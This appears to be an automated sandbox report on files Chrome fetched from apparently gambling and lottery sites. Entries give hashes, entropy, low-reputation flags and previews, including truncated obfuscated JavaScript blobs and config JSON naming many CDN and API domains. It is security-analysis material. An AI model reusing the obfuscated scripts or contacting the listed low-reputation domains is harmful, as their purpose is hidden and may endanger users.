                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAzAFgCYBdAGgG8BNACQHZqAuAMwFc0YAXAS3UxFLSkOASnIAiFkhAACJBwBOXTmIDcAeTAArEJwB0AExBMuaEAAV5KCCHkcAnpkFiA+s5BIAsin0sANiDEKADcoXxYQBgBCAAYAX2EhA0dSMQBbEDQWABkuOUDWdm5eUXkQDhZ5NGkYeMT9ZLEOKwBJVIBzfLZOHjRMErKKqpRajiSnMBQOJtTWjtIC7uLyUvLK6Xl4lRD5aoBeZbaGchgACwYxQCx5QA0VQAubQBjFQIzzsVjSKDAj0/PAZ0VAOLlARCNADdyjzQ53eKBYHGkkhepBgKE+ZzEgBUAwA7fkCQed4WgOLAoTDXtBEedABAqgFIQwDHcoAwF0xYk0QWkUDaGQ4gVxYAAKiAAB4cc7UwDyyoA66NhwH0xLEgCDNQCq8oANbUAfNa0k4oYDSJrSQwQFBILis176eQSmWANeVFaQnmJlar1aUYCAuEEAoSPsckYAOPUAg5GAO9TABkZtPhqVS6GkEEsYH8qVh8iQEsAxLGAb7lAFrKgEt9WlgMrcNAdV7yXwS4WAODlACORgEwlWlM0ogdI4xlofTrPzuWEQLgSwAJaYBBz0ADxqAODNaaGHbA7CGUL4lHZYaEJeTqbS2e8ubzSWTAJ2mgHh9SeG138qn3OexV4oXZiQLyY8vTZAA=")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (587), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):587
                                                                                                                                                          Entropy (8bit):5.037025933428312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:Ab8dkKeCxyWF0gRvJHrtbFKNkM+fpYzObOTks0JM9EaMCz:UWkKeFARvJVgNQpYzkOV8IV9
                                                                                                                                                          MD5:286675B3C67670C0F14297E633BE05A4
                                                                                                                                                          SHA1:36A200D8AB5D5E37E328700DF90D061F268C57CC
                                                                                                                                                          SHA-256:6F1E6A7E89A7B4451921BA1D6EA506A9855D4BFF2EC5F25587BF066516ACF025
                                                                                                                                                          SHA-512:D8A6C2C2D605CF93D1397B487B6ECCD7A115DC8334877F555A1F0E7ACB031A57F169F3A4E4CC592C9AA7862ABB8440AE8467B65E2FCC0D60F967678F0BC2D444
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/js/gamebox/common/urlencode.js
                                                                                                                                                          Preview:function UrlEncode(str){var hex="";var i,t;for(i=0;i<str.length;i++){t=hexfromdec(str.charCodeAt(i));if(t=="25"){t=""}hex+="%"+t}return hex}function hexfromdec(num){if(num>65535){return("err!")}first=Math.round(num/4096-0.5);temp1=num-first*4096;second=Math.round(temp1/256-0.5);temp2=temp1-second*256;third=Math.round(temp2/16-0.5);fourth=temp2-third*16;return(""+getletter(third)+getletter(fourth))}function getletter(num){if(num<10){return num}else{if(num==10){return"A"}if(num==11){return"B"}if(num==12){return"C"}if(num==13){return"D"}if(num==14){return"E"}if(num==15){return"F"}}};
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):19634
                                                                                                                                                          Entropy (8bit):7.963184945669312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:GQmYc2gqyEc+Ya0YgdNnx6g5LVW7DZ6/VUlOz0ouU0If1H9MwVlJyFR3ZqmeFliO:GQmYYqdc175dVx6gU7oZ7df1H9M5dFe3
                                                                                                                                                          MD5:1D8F3EE8FF9C810124A834D133E23195
                                                                                                                                                          SHA1:FC6D0D17A984C58E60CB1E7490FD8C730A972197
                                                                                                                                                          SHA-256:620E1BDF3C26704F4070CEED466065CFE6AE105D64F8EA11F1E619F1980E8BC6
                                                                                                                                                          SHA-512:CB8C7FBBF43568AD0FFC76B7CBB831CAFEED921B7DC3ED80960C7524B5DFA504F50E51588602EB84A4BBBABBD0A4ABFCA9608CB7374F929E400161B6BFBC8837
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/dg_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BDA0C9878D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BDA0C9868D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 55 x 55, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2356
                                                                                                                                                          Entropy (8bit):7.768596075375429
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:sKp7E1f9H6lj5nPXuJ5Wj1jBaWI3yt/8WDUhHr5PfasAsWEn8iI1:sKpE1f1Gj5+WjDeyFPDUhLNfaCWY8Z
                                                                                                                                                          MD5:BBCE6055C4E4ED313407236ED55A2EF7
                                                                                                                                                          SHA1:8100F68C22281BA17EDAFD50705D641EA3D624A1
                                                                                                                                                          SHA-256:84860AAB7B97C5A3149C8551277C45564CEE04764196544EA538BE26391031F6
                                                                                                                                                          SHA-512:F3D022A675EBDDDBB3AD123E0D57184318747363CA753D81D0AFAA27EB112B1863AAA92E5C4942B5A52225C4F147C75246EE9F1F25FE7DB99BC559538DFBF4F6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/lotto/lottery_qg.png
                                                                                                                                                          Preview:.PNG........IHDR...7...7......."t....PLTE....5u.hh..\..\.4u.9s.3u.9t.5t.2u..\..^..\..\..[.@r.._..[.2v.>r..^..[.2v..].3u..\..^..[.2u..[.;s..^.8t..]..[.:t.9t..[..[..\..\....8t..\..[.5u.3u.:s.Hp.bi.Ep..].2v..^..].Lo..^.Cq.Nn.vd.sd..^.Pn.xd..^..b..\.yc..a.Ar.jg.qe.=s.Jo.7t.]j.hh.Sm.=q.Jp.._.of.Ul.}b.eh.mf.{c.Wl.fh._i....Ol.Zi....@q..`..`..].Zk.lg.|a..a..^..].............>t....gf.......d..ag.rf..^......................Gz.en.}`......................}..c..X..R}.Mz.Iv.Yt.Oo..l.........................s..z...z.`x..w.|r.wq..h..f...............................u........m........r.........}.rz.yy.Kw.ht.zn..c...........................................................z........|..y.....m..p...s..q.qq.`q..o..m.mk.....................x.....h........^.....k..Q..t..M~.h{..v.Wo.................~..m.8l.~h.._m.s....*tRNS....G...G...................JJH.........=Kr....IDATH..]H.Q............}<..X..f...b.|.AVh-...Z...[u..1uz.......b]T.F.AE..]...c...s......=....?.sx..C..P...o.u.-..R.By...T...;.."q..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2484), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2484
                                                                                                                                                          Entropy (8bit):5.85730357680833
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:Vgn47wghu3BxoUjkvFq9HlQCPFs+jBq/eym8/N1X+ehAph5HetQU2TWt:VhKr7j4qnQB+tq/e18l1X+emph5+uvWt
                                                                                                                                                          MD5:86F942E15E63DC3381F4D8225DE2125A
                                                                                                                                                          SHA1:C01B693DA8C6B4F3238EA3CA46178BB2425B8FDF
                                                                                                                                                          SHA-256:C901A31171311458293FE13C67AE141CF3E678E467FE98531A213266EE2CBBB1
                                                                                                                                                          SHA-512:BDCA364D2E4D57D7D941F1A2713A16624DE9AA03E9AC098D74D030E58FDB0DF19C7C74C192447F7D146CD997036E87E2636F4E165DD2FD36D2D85D3B2B0327F4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/125/logo.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAVlwF0AaAbwCUIBmADwC4AzAVzRgBcBLdTdkkElACUZAETMkIAARJ2AJ04dRAbgDyYAFYgOAOgAmIRpzQgACnJQQQc9gE9MA0QH0nIJAFkUe5gBsQo8gA3KB9mEHoAQgAGAF8hZWC5KRQAXihMUSiYCEZRIRIkFMx0zM5TAAs8wQyAekCAcQAWPPyfNJ00TCR8zhSyNCgAW3DRHxQAcxQAmBRBiHQQNHYkejJOQahxkAAZFCgDOSZWDm5OkTkQdmY5NCkoHRBMAEZqakahHXZyxeKdMGM9Jg0L4fCRROMwgARFoxGIkPRQdhQI5sLg8c6Xa5oMgwPRoUyI8r0FD6QxQXzsHQAYXQsigSx0uLQAAkULISMwIGN9qzZMTSYxyT5KTS0HSGZzuXpeXw4CBbCsoiROEgAMrlFDAeiiKnlCzDUQRFIkgyCik6ACqXB8Oi27AAQhZgJI5Jh8kgNcBdpNIk8SGMfWQ4etxgSvr6Cp7VQB1ABiEaQwEYzPpeipPigAC9M6tgJw9OHRAFvpxxuV2NrRHDGBmPaq7H5c/nC40olEILRiyBS+XtdQ2x2ApZYJw7PRYrCSDALoiQHoUSd0WRElJ2Ckvir+Ck82g9JqdKqANIASQAcsoSk8AIIacZ5DI6GqiADUIGfohqAJAtB0GiQeU+b5OhYVFTgcEQVygFIQB0b59msHQAxQAoUicW1LgcWCQHguREImZDRFkWw/B0PMC0qIQAB9KKVXo0LtTC4IOPDJjBIiSJLMt2DyailXKFIbXuBjRnwsMKOUSkABITFodgABVFDgTAQMXM4yEpJC0hISkPU1GNY1Qh5dyQaNR3KX4Q1VOQYDBHRE1yfIdKjOMAH4NPwnRLOs9dGTxMT30/DYtgAWggGAaiQp9n3cyZPMGcYrJgehygAMhS3g4tDQkUnKRy7KTFNd3TLNMz6MjwyQEhON7Tg4TQgwM3s
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (4220), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4220
                                                                                                                                                          Entropy (8bit):5.906828281460689
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:V/JxSOsQ4TGVx2uBg08kI3Hgkqwd+Q5RPYdxFtlzNdc312KK:V/JxSO94Tm3Bg0g3AcrpYdRNNdf
                                                                                                                                                          MD5:17A4B054D10AF5255FECF72D14A151F3
                                                                                                                                                          SHA1:234B337FBD8D2A0E0ABFD26984837C83F593195A
                                                                                                                                                          SHA-256:FF79468D677772598FD564AD4E854D0DFAF81D5C3EE96171D9BDFB575AEAADD3
                                                                                                                                                          SHA-512:A18EF2C68B33D17193CC5FD867515190991BB99A0345EC2AAB3AB1DA651650C4ED8C9B0FA68BE536C82045121168885C62B95625CFA47479C57382EB3A0637AB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/125/footerNav.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHAVlwF0AaAbwCJ8EANYCgLgDMBXNGAFwEt1MkSOASjIBfEgHEAmgAUA7MzaceaPgJJRhFFkhAACJBwBOXThQDcAeTAArEJwB0AExBMuaENMMoIIQxwCemBwkFAD6oSBIALIojiwANiAU5ABuUPEsIAwAhAAMIoJmaYa6LAC8UJgUuTAQTBSCJCllZI5QHFAK7Ny8woYgHCyGaGRoUCkM2KQwjmjS7QAWDCxOLlAJHPYAwugGUGibM2gAEigGJF4sHL4MFG5MKIYAtu3KAPwUImJPAwuxSAxRCQYP12iBHF0lL0yMV9GUOAsuPwOGVgG5HChgPYAMoAaQAkgA5MyVCgpADmCwsDSq9gA9BQANQcRkUOlIFhgQnjezWJANewIkAqVjdZSYFjCWHNFY/NAsAAySI4JKqAEYAILWck0ij0pkstnokAAD15/MEgoWwswoqhKiEMKgJSg8PsDxQ10M9jGKTMSHsABJ3CaOAAVExwW2KHoqYQB30VewvLB22N8PoDIZofT2eLK5NQVMx8VIeP2aAIgBkVbZFGyZQDlYW9g5YAMhkwuRIasENb49gWUCQFmAcy8Pj8gQoYx+DRrFHrjZ9UB+AB81wPZyAyilsE3FkR7DAFo0DwiymzHDA3lxHJfGefTwUSEgCu/BO+SE8UGxrhC03FYQvhIMAWn6NBnEMSF0ylZ04QRJEBGXQMQRAMEAFFEjlYJXQDUIdHiJh7FCGANxVfpBmGXRSUcLgUmSMg9m4GAtniYcAQoD0vQAWl9T4SGwNUyhEhMeUSNByQRN59xI+It3GEhAN4R1KOzWTQnkzZ83OZSHUzKi0GwWj6OSbBNmbN5SUuXj8zQOBGJgdikABQ52IAL3c9QOCMAEyA4FAGAsxYQI0lIqgAHRzXQYtiuLdCZfCkCCFcfkEVkovi+KGiIQQGFJKBHOc1zjw8rz2l8wEFn6JggsHGqNwo
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 128 x 526
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):57501
                                                                                                                                                          Entropy (8bit):7.903741547344723
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:twBx7pibt6geixr2uu0chzkF66rpaiWljB:C3YbczMr2PthI86OljB
                                                                                                                                                          MD5:A50BC994387BD2427D313D8A403BDF13
                                                                                                                                                          SHA1:2A5BB4FED78663E312E77FF14D84A9E2A5DC77DC
                                                                                                                                                          SHA-256:7393CD0C086A729A854A00F4111E184918AD142D6888F626C3BEA2AA37B9FBA2
                                                                                                                                                          SHA-512:27947959D004AE6E2AC2943BAB988E28D19C0524139C5D9F8E649CBCF2AA2AFE3B205DDBA5E22F5E3E8C627DF491309EDE4B6AA48001153AC2590280D76E3CB9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:GIF89a...........kY.....,oR.....y...h.P......(2H.saWm>...q\..5..n..P../.....(..DJvI.........fR.Q.K;..p.sa...h.g..k.......Q.s..R.....o..!......YH....r\..4.....H..V3?Z.kY.iT....|h....t..I.aM....cQ.q],.l..o.6.yd....V-tdGvij....s.......ce........|.....p..m..8Da.&.3.%..[mqs..[...Q....s.IisG.....UIcs...;j...yd.iT.bL........\.]Q.....'....YE.MAl../T1KVj..xJ2"4.X....v........m..*..P.|h..|...eY......^.POB........,..o..tYC...u.....h............L...}......?......_?;d9|...m^..9..........n.........H.....|...........|a.=..lP....g..t.....i....H~...$-.m^.]N#H......|.}mw.Y.......eV.-9.!.ue...BE%.~....ue..oX.........t\.'bO.....a.nX..f.DO.L=..q.eU.aQ.]M.YI.UE.eQ.Q@.]I....4..QE.aU.UA.YM.QA.UF.YI.]N.QE.aQ.eV.YM.aU.]I.UA.eQ.....U....}m..ut=X]........!..NETSCAPE2.0.....!.......,...............H......*\.....;7.E:....s..W8r..S../.jz.T.F.8o?~.16.F.4.....&...za.....^D......^@v.M..U.7....L5.~...K..4..Z[.GY7j.. .......q.m..9r......89.\.L....-a....M..6m.L...g.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 83350
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17118
                                                                                                                                                          Entropy (8bit):7.987522400685147
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:2aUG4K6i++zvfh2wTXtOu2RvnKbdZBe2ry2or2R9xN4K26t:2E4wFHRR2RvnSdZBeLVG9f4c
                                                                                                                                                          MD5:5C2500D75EB68A2C902D98DB28F5BDB1
                                                                                                                                                          SHA1:E517E94A2D69AFDA857F633C403662DBF1B6131A
                                                                                                                                                          SHA-256:0F8B7C128B9CFEBC2E80E25956FB6903EBA1382D05A5F612E9B73DC17562BAE7
                                                                                                                                                          SHA-512:0DEAF240D068EC9E034A04E2D4EA8D82A1AFCBE278BB8647991299C3F6CA931EBC2A6E90C5E0FC1CD3191CC9EDBB16FE205E8D29256AF0700C7EAA20C364B755
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://2hsuoj.eveday.me/ftl/commonPage/themes/gui-base.css
                                                                                                                                                          Preview:...........}y...u....P3..!......N...#,.^Q.........A.%...;..Z".....:..|-....&EJ.2.._....y.D.zd.v..U..|../..g........G..Bq.;...U.s..?...?..o....p..*-r/...9.x~W....{.F.('!......I.JQ.~0.....g?.........~....r...I.G..(koWfwN.E~...A\U'w..~.n..7.....q$:..,.Be......./.x.._}.._...DY.."@.|..1..$...7......*...i..U.Be.Z.7U.F.u....Q..O...r.@..i...Eru...4?..QY.q.zQ.&...:J...J..h[c.....VEQ...FQ..l.4.mP....y.B1.V...{u......t....}.K..G.yT..eqV.......L.,.Q.&X`.b....es.....I,#t.....b,.....J.y.....g....u.$(..W.......G..(..V..<..E.M...h.Q..z..F.D.X*........xW..|..{.]]..u..._...a...$].........../.....K/..Q._.*.~~.T{..^.Y.OV9......5.A._.<...4D..P.`2E.......".>.Z..V.'|..W..2....A..l.J.t...A.q.-.....DX.X"N..Ju.=...1.....8$$A..K...H.z}.....s.....C..... y.y..bt.L...._..Q[8-.e.&jZe..)S.......Ki.o/....pI...g...........d...p..|{....^...V..."/......F.8.=3.n=.&Z..j...#...]t....k\.kJA~..U....<..e.D...5...W..0....Q<..K...=w..O^.......*.8.Z..h.E..$.J.D..p.......%\.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):127284
                                                                                                                                                          Entropy (8bit):5.964603194377986
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:cky/4ZA5fj6hXRyxAgjTvyjoph3gv4TY9gAm6:ckyh5fjAXRyOgHuof3gv59gH6
                                                                                                                                                          MD5:6C48020EC55839D18BB77C2A28C08404
                                                                                                                                                          SHA1:BBE2E524D3141DB333CB11774AB84E79D9E7423A
                                                                                                                                                          SHA-256:17D6DD25D3459F4ADA6C0F53A9D7009FCF2288F54907715A3A8423B837753400
                                                                                                                                                          SHA-512:A7DDA0387C8C25D759181E58A0FD25DCB3AD41FAADEACC61E208456D35D1DCB65BD4F3C67AD0AFDD3A23C12758374D137C5A6163326414C650B46D2D1C8E7784
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/common.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAJgGZcBdAGgG8AiABgA4BzAZSoC4AzAVzRgBcBLdJl5kQZNAEpqnJCAAESXgCd+fKgG4QAOigBeCiB4oAJiA7c+gtMKm9dXHgKG8pANyhK5YtGSVl+6uwoSpggulRUvrq8WgA2hgy8ABbiujTqaAA8ShkA1LkSmPzRWjBJHgDCJiAAgryYkhIAfLq4AGRt/Jmt+ADsAPwguSVlHnUNEqz8Tfg0ACwDocNMyvxoDFrsSigAthXlSlWmmPj4cwA+000EbbgArBKiy6vrm9t7B0cgmAR0l01NABsbUBhEeQ10KxUry2u32lWqP3wfyuNBBYMmS0hLw2sI+COOuAAnPh/kC2sRwc9obj3vDDojfmS0aCJBJ1EoQLxOEo0F4AL42dTuTzeXz+MhQMgoMhIcI1ABCFQAIgBRABiAHEABIASQQAGkADIAWQAcgB5AAKAEUAEpMAAqAFUAGoAdQAGgBNABaUDAMFM7AYSX4ACs4LEdmgUBAAI5KRScVzAAAeAE8AF40AiEOZ3QG9OhE3IAeg0QRCShK8XWyVSNFE4Q0WRyUn47CKunwdzubRiowZpnGaHyjzQul0SikEKQpQO4yu+CpunnQ/GmEInQkmUyc1XVCnGjAnKgcH5ncwekHn2qo/HqWns+G68X9WXq7fY3qW53e4uE45jRKBmiaA8njXBcf0wH5+1AvcV0go8TzPC8UBGO8R3qMcCkg78lCXAEkLnaDCN/bd+F3fdziAkCwIg0iN1/e42gQzJSR+Ek2hQMDAS/MjxlBHiJH5TluV5AUyFMGBqnMRwrBsCgq0wEUvHEcV+ElXQ0BAYA5BqJQlCgDNMAAWlwMgLKsyzrLs2yHJspz7OcxyXPctzPNc7yPJ8rzfICyzAXwPyyFBMg7hCu5CAiuYIruCLAQi3oIroCKiTCptAX8nKnKbSyQpiuKEqSlK0oy3B8ssggyFwGLcDi+5a
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):18388
                                                                                                                                                          Entropy (8bit):4.351571195978757
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:sPrmmNeqmORafrtTThDeJ+GgJttHVENDYXdk0hfbwSr:0rmFORstThDeJtgJtFVENMXdkMBr
                                                                                                                                                          MD5:AB2CBE8957927CF9923F1435AA517BC8
                                                                                                                                                          SHA1:C1F5439091C7914EE2E65D8E9E4DC31A17327AEC
                                                                                                                                                          SHA-256:36BFC70E4B7D8EE7D2C3687C8F704AE2021A8F1F61FF31AD71C6227C602391D7
                                                                                                                                                          SHA-512:9A51747CC8D842CDF60CD433964529A5CBDD02E83D2972D8059B5935F7EF912757FF4461E757B5F662195F22A86B65F7969151BF9DAA303B5F55FF483C6C6266
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi-aka.blackkhaki918.com/ocs/zbw?r=6891640824
                                                                                                                                                          Preview:{. "nnn": "outer-888",. "versions": {. "zb_m": "240606-01",. "zb_pc_member": "240529-01". },. "http": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1585","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1985"]. },. "https": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1586","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1986"]. },. "public_domain": ["cppublbyv2-ali.epie3d.com", "cppublbyv2-hw.zjbxxy.com", "cppublbyv2-ty.huliancc.com"],. "gb_app_ins_domains": ["appiso-ty.souzhanzx.com:1066", "appiso-ty.zvbzjsb.com:8066"],. "gb_plist_api_domains": ["qpplist.lcyj888.com"],. "gb_wx_proxy": "https://wy-ali.meriksenrusso.com",. "gb_disabled_proxy": true,. "gb_is_pc_sp
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 37 x 37, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2146
                                                                                                                                                          Entropy (8bit):7.506293248392959
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:ozNn286ttdvJ3a/GvN5bPImztphwPSHvgaYIu1i:y21ttq/GvN5bPvzXyIuk
                                                                                                                                                          MD5:80A871A008A510FA0D7CE2410FD023A2
                                                                                                                                                          SHA1:45202DF6EF6F31ACF18BD7EB65AE0733C8DCBAA2
                                                                                                                                                          SHA-256:25B9E28D608998D4FDEDFA45FCF1407745C49B61C32A9A89E002CE42DCDE0ABD
                                                                                                                                                          SHA-512:AA4DBF2760BD2DBA851D392AFE3BEE2D8B619A47CB92D06039CBD74790D143CA0F2B7113EAE9B2BA59017C0BCEF6E71EE3C4E8BE0A8011EB0D710A559986DA46
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...%...%...... .....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.6 (Macintosh)" xmpMM:InstanceID="xmp.iid:C527148F1EC611EE8653DFFA3047B159" xmpMM:DocumentID="xmp.did:C52714901EC611EE8653DFFA3047B159"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DB807D401E3C11EE8653DFFA3047B159" stRef:documentID="xmp.did:C527148E1EC611EE8653DFFA3047B159"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>6%^[....IDATx..{l.E..o.r.E.%..B.......Dz...#..Cc.../....J..<.@4..............!.4.Q1..jS.........w..w.w..&.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/cc.png?r=8690266696
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2747
                                                                                                                                                          Entropy (8bit):5.373572542949478
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:Yv1FLJxwewo9BI9R8/ZxD9Hk4026jz6PB8z76q5HdKgMfWhLgPRc8h:GjDcoMLKJE40OaddrYK2c8h
                                                                                                                                                          MD5:5C014C791C3C871978A5E9D12E14EB46
                                                                                                                                                          SHA1:A1D227AC8478F66AF9951EF39E13D375F99A3314
                                                                                                                                                          SHA-256:A53CEA0DD1D8D5BFA8DC211FFD0CF7CC949EF8A8E940169D0B54F7F5CAC81E0A
                                                                                                                                                          SHA-512:7672C842373E417A8E995DB2DF9B683979BF9CA09720AE2ED9B148EB0021DE9866D9758742BBC0340B1A551194ACB27B5D2BC1A7B5CB00E5BBD6ED1EAE35DCEE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', 'c0f51ba154f1c0d141fccf42aa8b5791');","domainType":1,"agentCode":"101336017191","snType":1,"iconRel":"/fileupload/ll12/202312/202312180557505.png","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"ll12","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{"videoProfitDayThreshold":300000,"agentBalanceControlFlat":0,"openUserFeeFlat":1,"openUserPointFlat":0,"lotteryProfitDayThreshold":"1000000","autoDrawAmount":500000,"openAutoDrawFlat":2,"regCaptchaType":"normal","captchaType":"normal","vipShowFlag":0,"smsLoginFlag":0,"thirdpartyTr
